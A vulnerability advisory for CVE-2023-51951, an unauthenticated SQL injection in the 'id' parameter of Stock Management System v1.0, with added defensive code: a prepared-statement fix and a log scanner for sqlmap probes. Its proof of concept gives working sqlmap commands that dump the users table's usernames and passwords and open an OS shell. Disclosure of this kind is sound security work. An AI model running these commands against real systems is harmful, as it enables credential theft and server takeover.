Security Research & Advisories

SQL Injection in Stock Management System v1.0

Vendor:
Product: Stock Management System
Affected Version(s): 1 and probably prior
Tested Version(s): 1
Vendor Notification: 18 December 2023
Advisory Publication: 18 December 2023 [without technical details]
Vendor Fix: N/A
Public Disclosure: 18 December 2023
Latest Modification: 18 December 2023
CVE Identifier: CVE-2023-51951
Product Description: This is a Stock Management System in PHP and MySQL Database that provides an online and automated platform for shops or businesses.
Credits: Josué Cruz Mier, Security Researcher & Penetration Tester @wizlynx group

Vulnerability Details

SQL Injection
Severity: Critical
CVSS Score: 9.8
CWE-ID: CWE-89
Status: Open
Vulnerability Description
The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0. An SQL injection occurs when a value originating from the client's request is used within a SQL query without proper sanitisation. This could allow attackers to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.
CVSS Base Score
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: High

PoC

Demonstration

Source code: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
Vulnerability location: /sms/admin/purchase_order/manage_bo.php, id parameter

Line 3 of manage_bo.php invokes a SQL query built with input that comes from an untrusted source, specifically provided in the 'id' parameter. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.

<?php
if(isset($_GET['id'])){
    // $_GET['id'] is interpolated directly into the SQL string: a quote in the
    // value closes the string literal and the remainder is parsed as SQL.
    $qry = $conn->query("SELECT p.*,s.name as supplier FROM purchase_order_list p inner join supplier_list s on p.supplier_id = s.id  where p.id = '{$_GET['id']}'");
    if($qry->num_rows > 0){
        // Every column of the row becomes a PHP variable named after the column.
        foreach($qry->fetch_array() as $k => $v){
            $$k = $v;
        }
    }
}
?>

... omitted for brevity ...
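The following is an added example of how the quoted snippet can be fixed; it is not code from the Stock Management System project. It assumes that $conn is the project's mysqli connection (the snippet above uses $conn->query() and num_rows, which is mysqli style), that the mysqlnd driver is available for get_result(), and that purchase_order_list.id is an integer primary key. It applies three defences: the id parameter is validated as a positive integer before use, the query is a prepared statement so the value can never be parsed as SQL, and database errors are logged server-side instead of being echoed to the client.

```php
<?php
// Added example, not the project's code: a hardened replacement for the
// manage_bo.php snippet quoted in the advisory. Assumes $conn is the project's
// mysqli connection and purchase_order_list.id is an integer primary key.

// 1. Validate the shape of the parameter before it goes anywhere near SQL.
//    filter_input() returns null when id is absent and false when it is not a
//    positive integer, so a value containing a quote is rejected right here.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1],
]);

if ($id !== null && $id !== false) {
    // 2. Prepared statement: the id is sent to the server separately from the
    //    query text, so it is never interpreted as part of the SQL statement.
    $stmt = $conn->prepare(
        'SELECT p.*, s.name AS supplier '
        . 'FROM purchase_order_list p '
        . 'INNER JOIN supplier_list s ON p.supplier_id = s.id '
        . 'WHERE p.id = ?'
    );
    if ($stmt === false) {
        // 3. Keep database error text out of the HTTP response. Echoing
        //    $conn->error to the client is what makes the error-based
        //    extraction shown in this advisory possible.
        error_log('manage_bo.php: prepare failed: ' . $conn->error);
        http_response_code(500);
        exit('An internal error occurred.');
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $result = $stmt->get_result();   // requires mysqlnd (assumption)

    // 4. Read the row into a single array instead of the original "$$k = $v"
    //    loop, which turns every column name into a PHP variable and can
    //    overwrite existing ones (a column called "conn" would replace $conn).
    $order = ($result !== false) ? $result->fetch_assoc() : null;
    $stmt->close();
}
?>
```

Step 1 alone would already stop this particular injection, but step 2 is the control that holds even when a parameter is not numeric (names, search strings), so it is the one to apply across the code base rather than per-parameter validation only.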

Sending a single quote character in the id field makes the application return a database error message, which indicates that it is most likely vulnerable to SQL injection:

Extracting information via SQL injection Demonstration

Using SQLmap, we will automate the SQL injection exploitation to retrieve data from the database by using a technique based on error messages provided by the application:

Command: sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb --dbs

The screenshot above tells us five databases are available. We will now enumerate all tables within the sms_db database:

Command: sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb -D sms_db --tables

We can proceed to the next step which consists of extracting data within a table. As illustrated in the screenshot below, we were able to extract information from the users table:

Command: sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb -D sms_db -T users -C username,password --dump

Additionally, we were able to upload a web shell and execute commands directly from sqlmap as shown in the screenshot below:

Command: sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb --os-shell
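From the defender's side, the exploitation sequence above leaves a recognisable trail in the web server's access log: requests to the manage_po page whose id parameter is not a plain integer (the single-quote probe, then sqlmap's error-based payloads), often carrying sqlmap's default User-Agent. The following PHP CLI script, added here as an example and not part of the advisory, scans Apache/nginx combined-format log lines for exactly that. The log lines are constructed for this example; only the request path and parameter names come from the advisory, and the IP addresses, timestamps and User-Agent strings are made up.

```php
<?php
// Added example, not part of the advisory: flag access-log requests to the
// vulnerable endpoint whose id parameter is not a plain integer, or that
// carry a sqlmap User-Agent. Sample log lines below are constructed.

const VULNERABLE_PAGE = 'purchase_order/manage_po';

$sampleLog = <<<'LOG'
203.0.113.10 - - [18/Dec/2023:10:00:01 +0000] "GET /sms/admin/?page=purchase_order/manage_po&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [18/Dec/2023:10:00:07 +0000] "GET /sms/admin/?page=purchase_order/manage_po&id=1%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.10 - - [18/Dec/2023:10:00:12 +0000] "GET /sms/admin/?page=purchase_order/manage_po&id=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7.11"
203.0.113.25 - - [18/Dec/2023:10:01:03 +0000] "GET /sms/admin/?page=home&id=2%27 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
LOG;

/**
 * Returns one entry per suspicious request: client IP, timestamp, decoded id,
 * response status and the reasons it was flagged. Unparseable lines are skipped.
 */
function findSuspiciousRequests(string $log): array
{
    // Combined log format: ip ident user [time] "METHOD target HTTP/x" status size "referer" "user-agent"
    $pattern = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP\/[\d.]+" (\d{3}) \S+ "[^"]*" "([^"]*)"/';
    $hits = [];

    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match($pattern, $line, $m)) {
            continue;
        }
        [, $ip, $ts, $target, $status, $ua] = $m;

        $query = parse_url($target, PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;
        }
        parse_str($query, $params);   // also percent-decodes, so %27 becomes '
        if (($params['page'] ?? '') !== VULNERABLE_PAGE) {
            continue;                  // only the endpoint named in the advisory
        }

        $reasons = [];
        if (isset($params['id']) && !ctype_digit((string) $params['id'])) {
            $reasons[] = 'id is not a plain integer';
        }
        if (stripos($ua, 'sqlmap') !== false) {
            $reasons[] = 'sqlmap User-Agent';
        }
        if ($reasons !== []) {
            $hits[] = [
                'ip'      => $ip,
                'time'    => $ts,
                'id'      => $params['id'] ?? null,
                'status'  => (int) $status,
                'reasons' => $reasons,
            ];
        }
    }
    return $hits;
}

foreach (findSuspiciousRequests($sampleLog) as $hit) {
    printf("%s %s id=%s status=%d: %s\n",
        $hit['time'], $hit['ip'], var_export($hit['id'], true),
        $hit['status'], implode(', ', $hit['reasons']));
}
```

On the constructed input the second and third lines are reported (quoted id, then sqlmap User-Agent) and the first is not. The fourth line is deliberately left alone because the check is scoped to the endpoint in this advisory; widening the `page` filter to every module that takes an `id` parameter is a one-line change once the other pages have been reviewed. Note that the User-Agent check is a weak signal on its own since it is trivially changed by the client, whereas the non-integer id check holds regardless of the tool used.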
